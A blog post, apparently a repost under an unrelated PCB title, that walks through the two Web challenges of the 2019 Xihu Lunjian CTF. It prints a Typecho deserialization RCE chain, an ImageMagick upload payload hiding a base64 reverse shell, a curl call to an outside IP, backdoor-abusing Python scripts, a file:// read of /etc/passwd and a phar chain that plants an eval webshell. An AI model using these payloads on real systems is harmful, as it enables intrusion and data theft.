ad输出光绘文件_2019西湖论剑AD攻防Web题解

最新推荐文章于 2024-03-19 09:50:02 发布
最新推荐文章于 2024-03-19 09:50:02 发布
阅读量206 收藏
点赞数
文章标签: ad输出光绘文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39757122/article/details/112348292
版权

edeb0d8cbec8bae9dc4e3fd51b1a77d4.gif

dc738866ba7fd44b0ceb533617e37d06.png前言

上周参加了西湖论剑线下赛,在AD攻防赛中喜迎冠军,以下是AD攻防赛中2道web的题解。

dc738866ba7fd44b0ceb533617e37d06.pngWeb1 - typecho

整体源码如下:

ba57bf535ad5124fe01d8c0e64afc763.png

因为是typecho CMS,所以肯定有已知CVE,由于之前审计过,这就不重新分析了,只分析人为加入的。

漏洞1 - 反序列化CVE

https://skysec.top/2017/12/29/cms%E5%B0%8F%E7%99%BD%E5%AE%A1%E8%AE%A1-typecho%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E/

可参加我以前分析的这篇文章,构造如下序列化,进行RCE:

class Typecho_Feed{

    private $_type='ATOM 1.0';

    private $_items;

    public function __construct(){

        $this->_items = array(

            '0'=>array(

                'author'=> new Typecho_Request())

        );

    }

}

class Typecho_Request{

    private $_params = array('screenName'=>'phpinfo()');

    private $_filter = array('assert');

}

$poc = array(

'adapter'=>new Typecho_Feed(),

'prefix'=>'typecho');

echo base64_encode(serialize($poc));

漏洞2 - Imagick

通过源码diff,可以发现:

/var/Widget/Users/Profile.php

有明显不同,插入了一大段代码:

3e5d572d6dd39fcce461ba51039e9edf.png

我们审计这段代码,可以发现关键点:

try {

    $image = new Imagick($file['tmp_name']);

    $image->scaleImage(255, 255);

    file_put_contents($path, $image->getImageBlob());

} catch (Exception $e) {

    $this->widget('Widget_Notice')->set(_t("头像上传失败"), 'error');

    $this->response->goBack();

}

这段代码使用了Imagick(),而该函数存在RCE漏洞。

我们以如下代码为例进行测试:

e64cd43146fa546647f384d16e58c510.png

构造上传内容为:

Content-Disposition: form-data; name="file_upload"; filename="exp.gif"

Content-Type: image/jpeg

push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pICZndDsmIC9kZXYvdGNwL2lwL3BvcnQgMCZndDsmMQ== | base64 -d | bash`"| cat flag " )'

pop graphic-context

即可RCE。

漏洞3 - authcode泄露

我们diff可以发现如下路径,存在新增文件:

/var/Sitemap.php

c3f8abe4269fede5b69504b01c76b32e.png

我们审计代码发现关键点:

function ab($a='a')

{

    $b = authcode(base64_decode('MjJkZnFseEVScHcxWkU5c08raGxoOUJzWGFKM0F3NWVPMm5QUUFISm5WSDhuTGc='));

    $b($a);

}

{

    ob_start(ab);

    echo authcode($_GET['site']);

    ob_end_flush();

}

我们直接var_dump($b),发现为system,即此处如果可控$a,则可进行RCE。

我们测试一下:

function ab($a='a')

{

  // replace all the apples with oranges

return system($a);

}

ob_start("ab");

?>

curl 106.14.114.127:24444

ob_end_flush();

?>

可收到请求:

c4179e5fb3460fc4e81b433eda76fc9d.png

则不难发现,如果我们能控制如下函数的输出内容,即可进行任意RCE。

authcode($_GET['site']);

那我们跟进authcode:

function authcode($string, $key = '12333010101') {

    $ckey_length = 4;

    $key = md5($key ? $key : $GLOBALS['discuz_auth_key']);

    $keya = md5(substr($key, 0, 16));

    $keyb = md5(substr($key, 16, 16));

    $keyc = substr($string, 0, $ckey_length);

    $cryptkey = $keya . md5($keya . $keyc);

    $key_length = strlen($cryptkey);

    $string =  base64_decode(substr($string, $ckey_length));

    $string_length = strlen($string);

    $result = '';

    $box = range(0, 255);

    $rndkey = array();

    for ($i = 0; $i <= 255; $i++) {

        $rndkey[$i] = ord($cryptkey[$i % $key_length]);

    }

    for ($j = $i = 0; $i < 256; $i++) {

        $j = ($j + $box[$i] + $rndkey[$i]) % 256;

        $tmp = $box[$i];

        $box[$i] = $box[$j];

        $box[$j] = $tmp;

    }

    for ($a = $j = $i = 0; $i < $string_length; $i++) {

        $a = ($a + 1) % 256;

        $j = ($j + $box[$a]) % 256;

        $tmp = $box[$a];

        $box[$a] = $box[$j];

        $box[$j] = $tmp;

        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

    }

    if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) &&

        substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {

        return substr($result, 26);

    } else {

        return '';

    }

}

依次分析,首先key已知为12333010101,那么:

$cryptkey = $keya . md5($keya . $keyc);

$key_length = strlen($cryptkey);

分别为:

afbedca20d58ccf2ceab39618a931d526ba4b613c047adffd92173daa701cdb6

64

然后操作:

$string =  base64_decode(substr($string, $ckey_length));

$string_length = strlen($string);

所以我们构造的payload的base64长度要小于64。

然后是一堆流密钥生成步骤,到最后解密这一块:

for ($a = $j = $i = 0; $i < $string_length; $i++) {

        $a = ($a + 1) % 256;

        $j = ($j + $box[$a]) % 256;

        $tmp = $box[$a];

        $box[$a] = $box[$j];

        $box[$j] = $tmp;

        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

    }

最后有一步操作,即将我们输入的密文$string,异或上之前的流密钥,得到明文$result。

那么如果我们想要已知明文求密文,即用$result异或上流密钥即可:

$string .= chr(ord($result[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

那我们怎么获取$result呢?还有一步校验要通过:

if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) &&

        substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {

        return substr($result, 26);

    }

我们可以用如下方式生成$result:

$keyb = "9528c27d9961b981415d909a120c6e1b";

$result = 'ls';

$tmp = substr(md5($result . $keyb), 0, 16);

$padding = '0000000000';

$result = $padding.$tmp.$result;

var_dump($result);

最后异或之前的流密钥,再base64encode,即可得到我们的input,达到任意RCE的目的。

值得注意的是还有一步:

$keyc = substr($string, 0, $ckey_length);

在我们只有明文,没有加密算法的时候,他需要对密文进行截取,这就非常难办了。但是好在:

$ckey_length = 4;

由于其在base64encode之后,所以我们可以对其进行爆破,数量级为64^4,还是在可爆破的范围内。

这样很容易即可进行RCE(这样的题目放在4个小时,2个web的AD下,可能不太好吧= =)。

dc738866ba7fd44b0ceb533617e37d06.pngWeb2 - Mycms

整体源码如下,我们依次审计:

b624b245185b31ee9194c531398cb390.png

漏洞1 - 预留回调函数

/footer.php

if($_SERVER['SCRIPT_FILENAME']==__FILE__){

    echo '

© mycms

';

}else{

    array_filter(array(base64_decode($data["name"])), base64_decode($data["pass"]));

}

?>

从代码不难看出:

array_filter(array(base64_decode($data["name"])), base64_decode($data["pass"]));

该位置存在命令执行,例如:

array_filter(array('ls /tmp'),'system');

e3bce3a524a7bd0a779c8567ecd4321c.png

但是如果直接访问footer.php:

http://localhost/footer.php

会直接打印:

© mycms

所以需要找到一个包含点,不难发现index.php有:

那么只要$data["name"]和$data["pass"]可控,即可进行任意命令执行。

我们跟进两个变量:

/libs/inc_common.php

$data = array_merge($_POST,$_GET);

可以发现,既可以用$_POST也可以用$_GET进行传参。

所以第一个漏洞利用exp可以写为如下:

import requests

import base64

url = 'http://localhost/index.php'

data = {

"name":base64.b64encode('ls'),

"pass":base64.b64encode('system')

}

r = requests.post(data=data,url=url)

漏洞2 - 预留登录shell

/shell.php

session_start();

if ($_SESSION['role'] == 1) {

    eval($_POST[1]);

}

我们发现有一个较为明显的预留shell,但是需要:

$_SESSION['role'] == 1

我们跟进该值:

/login.php

if (User::check($user, $pass)) {

        setcookie("auth",$user."\t".User::encodePassword($pass));

        $_SESSION['user'] = User::getIDByName($user);

        $_SESSION['role'] = User::getRoleByName($user);

        $wrong            = false;

        header("Location: index.php");

    } else {

        $wrong = true;

    }

}

可以发现如上登录函数,其中有赋值操作:

$_SESSION['role'] = User::getRoleByName($user);

跟进该函数getRoleByName():

public static function getRoleByName($name)

    {

        $users = User::getAllUser();

        for ($i = 0; $i < count($users); $i++) {

            if ($users[$i]['name'] === $name) {

                return $users[$i]['role'];

            }

        }

        return null;

    }

再跟进getAllUser():

public static function getAllUser()

    {

        $sql = 'select * from `user`';

        $db  = new MyDB();

        if (!$users = $db->exec_sql($sql)) {

            return array(array('id' => 1, 'name' => 'admin', 'password' => self::encodePassword('admin123'), 'role' => 1));

        }

        return $users;

    }

可以发现有admin账户信息,容易知道admin账户为:

username = admin

password = admin123

那么综合来看,只需使用该账户登录,即可使用shell.php。

那么可以写出如下exp:

import requests

url = "http://localhost/login.php"

s = requests.session()

data = {

'user':'admin',

'pass':'admin123'

}

r = s.post(url, data=data)

data = {

'1':"system('ls');"

}

url = "http://localhost/shell.php"

r = s.post(url,data=data)

漏洞3 - 管理员覆盖

我们注意到注册页面:

/register.php

$data["name"] = addslashes($data['name']);

$data["password"] = User::encodePassword($data['password']);

$res = User::insertuser($data);

我们跟进insertuser():

public static function insertuser($data)

{

        $db = new MyDB();

        $sql = "insert into user(".implode(",",array_keys($data)).") values ('".implode("','",array_values($data))."')";

        if (!$result = $db->exec_sql($sql)) {

            return array('msg' => '数据库异常', 'code' => -1, 'data' => array());

        }

        return array('msg' => '操作成功', 'code' => 0, 'data' => array());

}

发现关键语句:

$sql = "insert into user(".implode(",",array_keys($data)).") values ('".implode("','",array_values($data))."')";

未对$data进行判断,不但未进行查重,也没对数组内容进行check,我们可以顺便传入role,覆盖管理员。

可写出如下脚本:

import requests

s = requests.session()

url = "http://localhost/register.php"

data = {

'name':'skysky'

'password':'skysky'

'role':'1'

}

r = s.post(url, data=data)

url = "http://localhost/login.php"

data = {

'user':'skysky',

'pass':'skysky'

}

r = s.post(url, data=data)

data = {

'1':"system('ls');"

}

url = "http://localhost/shell.php"

r = s.post(url,data=data)

漏洞点4 - 任意文件读取

我们看到文件:

/down.php

if (isset($data['filename'])) { 

    if(preg_match("/^http/", $data['filename'])){

        exit();

    }

    chdir("/var/www/html/static/img/");    

    if (file_exists($data['filename'])) {

        header("Content-type: application/octet-stream");

        header('content-disposition:attachment; filename='.basename($data['filename']));

        echo file_get_contents($data['filename']);exit();

    }else{

        echo "文件不存在";

    }

}

?>

这里对filename参数做了过滤,但过滤非常有限,我们可以用file协议进行任意文件读取:

http://localhost/?filename=file:///etc/passwd

漏洞点5 - 反序列化

我们看到文件:

/libs/class_debug.php

class Debug {

    public $msg='';

    public $log='';

    function __construct($msg = '') {

        $this->msg = $msg;

        $this->log = 'errorlog';

        $this->fm = new FileManager($this->msg);

    }

    function __toString() {

        $str = "[DEUBG]" . $msg;

        $this->fm->save();

        return $str;

    }

    function __destruct() {

        file_put_contents('/var/www/html/logs/'.$this->log,$this->msg);

        unset($this->msg);

    }

}

可以发现这里有比较明显任意写文件漏洞,但我们需要控制文件名和文件内容,即:

$this->log

$this->msg

这里的exp构造较为容易:

class Debug {

public $msg='sky.php';

    public $log='<?php @eval($_POST[\'sky\'])';

}

$a = new Debug();

var_dump(serialize($a));

可以得到我们的payload:

O:5:"Debug":2:{s:3:"msg";s:7:"sky.php";s:3:"log";s:26:"<?php @eval($_POST['sky'])";}

但是我们缺少一个触发序列化的点,这里容易想到phar反序列化。

我们全局搜索file_exists(),可以发现/down.php中存在该操作:

if (file_exists($data['filename']))

同时该处没有对伪协议进行过滤,我们可以使用操作:

filename=phar://......

于是我们进一步寻找上传点,我们在/admin.php发现对应上传功能:

else if ($data['action'] == 'send_article') {

    $res = Article::sendArticle($data);

    echo "

    echo "

}

我们跟进sendArticle():

$oldname  = $_FILES['files']['name'];

$tmp      = $_FILES['files']['tmp_name'];

$pathinfo = pathinfo($oldname);

if (in_array($pathinfo['extension'], array('php', 'php3', 'php4', 'php5'))) {

    return array('msg' => '文件上传类型出错', 'code' => -1, 'data' => array());

}

$nameid = time() . rand(1000, 9999);

$name =  $nameid. '.' . $pathinfo['extension'];

$filepath = dirname(dirname(__FILE__)) . '/uploads/';

$file = 'uploads/' . $name;

if (!move_uploaded_file($tmp, $filepath . $name)) {

    return array('msg' => '文件上传出错', 'code' => -1, 'data' => array());

}

这里可以看到几个过滤,首先对后缀名进行了过滤:

'php', 'php3', 'php4', 'php5'

然后进行了重命名,但这都不重要。我们可以构造图片后缀的phar文件,然后上传,结合file_exists()触发反序列化。

构造如下:

class Debug {

public $msg='sky.php';

    public $log='<?php @eval($_POST[\'sky\'])';

}

$a = serialize(new Debug());

$b = unserialize($a);

$p = new Phar('./skyfuck.phar', 0);

$p->startBuffering();

$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');

$p->setMetadata($b);

$p->addFromString('test.txt','text');

$p->stopBuffering();

rename('skyfuck.phar', 'skyfuck.jpg')

?>

上传图片后即可触发反序列化,通过:

http://localhost/down.php?filename=phar://uploads/1234.jpg

即可任意写shell。

dc738866ba7fd44b0ceb533617e37d06.png后记

听说两个cms一起有是几个洞 = =,先分析一下目前我找到的吧~有空再继续挖掘!

76b97d46ec58d029302e9e4255f17f68.png

d99544f076112d364b5eb70e5aaae6e7.png

weixin_39757122
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AltiumDesigner——光绘文件输出
霁风AI
08-12 4179
1. 概述 在我们设计完成一个方案的 PCB 后,对于 altium designer 这一款软件,可以直接把 PCB 文件发送到板厂,进行生产,如果我们在设计之中为了方便而标识了一些技术参数,这些技术参数不希望别人看到,那么就需要通过输出钢网文件进行 PCB 的生产制作。 2. 添加钻孔数据输出 首先在输出钢网文件之前,先在钻孔层添加钻孔数据的输出,这样生产钢网的时候同时会生成钻孔参数。如下图: 3. 钢网文件输出 (1)操作选项如下 (2)参数设置如下 1)General 2)Layers 说..
AD09导出光绘文件(Gerber)
a201754646的博客
06-23 5344
Altium Designer 09生成光绘文件需要以下三个步骤: 如下所示 1. 选择 文件\制造输出\Gerber Files 进行设置,第一步: ①设置图纸单位和格式 画线层选择为 所有使用的 ,就会自动勾选你画图过程中用到的所有层;映射层是让图纸变成镜像了,选择为ALL OFF,就不会发生镜像。③设置钻孔图层④设置光圈 ⑤高级选项第二步:选择 文件\制造输出\Gerber Files 进行设置 第三步:点击 文件 制造输出 NC Drill Files 直接点确定 自此,PCB光绘文件
.md是什么文件_文件腾转挪移操作,那都不是事儿
weixin_39928768的博客
11-26 134
最近公众号内推送了我的系列视频教程《python文本分析:从入门到精通》,这个课程的分享原则是只讲最简单最好用的知识,用最少的时间去解决最头疼的问题。这样对于人文社科类的python初学者会降低认知压力,增强学习自信。今天我们汇总整理下文件读写的一些事情,对文本分析系列课做一些有意义的补充。涉及到的库包括os、shutil、zipfile获取信息代码功能os.getcwd("path")...
Altium Designer 19 导出光绘文件(转)
编程笔记
12-08 1472
Altium Designer 19 导出光绘文件 一、点击 文件--制造输出--Gerber Files 第一次设置如下 绘制层点击进去全选 钻孔光圈 符号大小50mil 生成文件 关闭不用保存 蚀刻图 二、点击 文件--制造输出--Gerber Files 第二次设置如下 生成文件 其他选项同第一次 生成钻孔定位文件 三、文件--制造输出--NC Drill设置 确定 确定 生成的是孔形状文件 项目文件夹下 Project Outp
Altium Designer输出光绘实用操作指导
最新发布
weixin_50804790的博客
03-19 802
在File菜单中选择Fabrication Outputs-NC Drill Files输出钻孔文件
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
leetcode题解_leetcode_leetcode题解_
09-29
《LeetCode题解》是广大程序员提升算法能力和解决实际编程问题的重要资源库。它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括...
Leetcode 5个经典元素和问题题解_leetcode_leetcode题解_
10-01
本资源包含五个经典的LeetCode问题及其题解,这些题目涵盖了不同的算法类型,是学习和复习编程基础的宝贵资料。下面将详细阐述每个题目及其解题策略。 1. **2Sum (1)**: 这是LeetCode中的经典问题,标签为 "数组" ...
acm.rar_浙江大学 ACM 题解
09-24
【压缩包子文件文件名称列表】"acm" 暗示压缩包中可能包含一系列的文件,如题目描述文档、解题代码、解答报告等,这些文件可能按照年份、难度或主题进行组织,便于用户查找和学习。 在ACM竞赛中,参赛队伍需要在...
树链剖分_题解_
10-03
题解将详细介绍树链剖分的概念、实现原理以及其在 luoguP3384 题目中的应用。 首先,我们来理解树链剖分的基本思想。给定一棵树,我们希望将其分割成若干个尽可能短的链,使得每个节点到根节点的路径上只经过了...
美易企业建站系统(MyCMS) v2.0 开源版.rar
07-06
本版带文章模块(可自定义功能模块),请重新安装,数据库前缀修改一下,以免覆盖原有数据表。 “美易企业建站系统“是专门针对设计师和非专业人士设计的中小企业快速建站系统,建造大型站点请选用其他CMS系统。 特点:模版制作简单,系统操作简便,独创的以“设计为主,程序为辅”,这种最能展示企业形象,而设计的自定义组合式模版,真正的全静态模版,标签无参数,不受系统限制,用户可根据需要自行添加模版,完全抛开程序的束缚,无需程序员配合,就可做出与定制程序一样的动态网站。
美易企业建站系统(MyCMS) v2.5 开源版.rar
07-06
美易企业建站系统 MyCMS 2.50 版 本版带文章模块、数据备份、后台菜单管理,请重新安装,数据库前缀修改一下,以免覆盖原有数据。 “美易企业建站系统“是专门针对设计师和非专业人士设计的中小企业快速建站系统,建造大型站点请选用其他CMS系统。 特点:模版制作简单,系统操作简便,独创的以“设计为主,程序为辅”,这种最能展示企业形象,而设计的自定义组合式模版,不受系统限制,用户可根据需要自行添加模版,完全抛开程序的束缚,无需程序员配合,就可做出与定制程序一样的动态网站。 程序支持在添加的内容(单页、文章)中嵌入文章、留言等调用标签,请注意不是在模版中,而是在添加的内容中。 系统自带的数据备份工具可以用来导出单独的数据表并自定义导出字段,用来转换部分其他系统数据到本系统中。
mycmsms靶机wp
m0_52496313的博客
08-04 841
mycmsms靶机wp
实战打靶集锦-004-My-Cmsms
阿尔泰野狼的博客
02-11 913
记录博主一次艰难曲折的打把经历
AD21进行光绘文件,装配文件,BOOM表输出
qq_44149667的博客
07-21 3291
基于AD21的装配文件等工艺文件输出
权限过滤器,防止未登录直接进入页面
molkor的博客
07-05 1696
1
找出文件a.txt和文件b.txt中相同的内容-shell
yychenxie21的专栏
05-09 2332
1 找出文件a.txt和文件b.txt中相同的内容: awk 'NR==FNR{a[$0]++} NR>FNR&&a[$0]' a.txt b.txt awk 'NR==FNR{a[$0]}NR>FNR{ if($1 in a) print $0}' a.txt b.txt 2 在a.txt文件中找出不在b.txt中的内容并输出 ...
getshell总结(国内常见cmswebshell)
weixin_45509216的博客
05-01 1273
文档:getshell总结.note 链接:http://note.youdao.com/noteshare?id=b58d8f4a93c3e5cb0f40ffa5243c11e6&sub=A2B0957B245545E085B2D45616CE3E78
记某CMS漏洞getshell
zhangge3663的博客
05-05 2815
记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等。 于是就引起了我的兴趣想去测试一下。 信息收集 还是因为自己太懒,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。(不能随便乱日) 弱密码yyds 搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。 看到后台?!嗯
"复变函数题解_2019秋 学生总结"。
复平面上三个相异且不共线的点z1, z2, z3构成一个三角形∆z1z2z3。我们要求出这个三角形的外接圆圆心z0的坐标,并证明当且仅当z0 = z1+z2+z3时,∆z1z2z3为正三角形,并求出外接圆的半径r。 根据外心的定义,外接圆...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值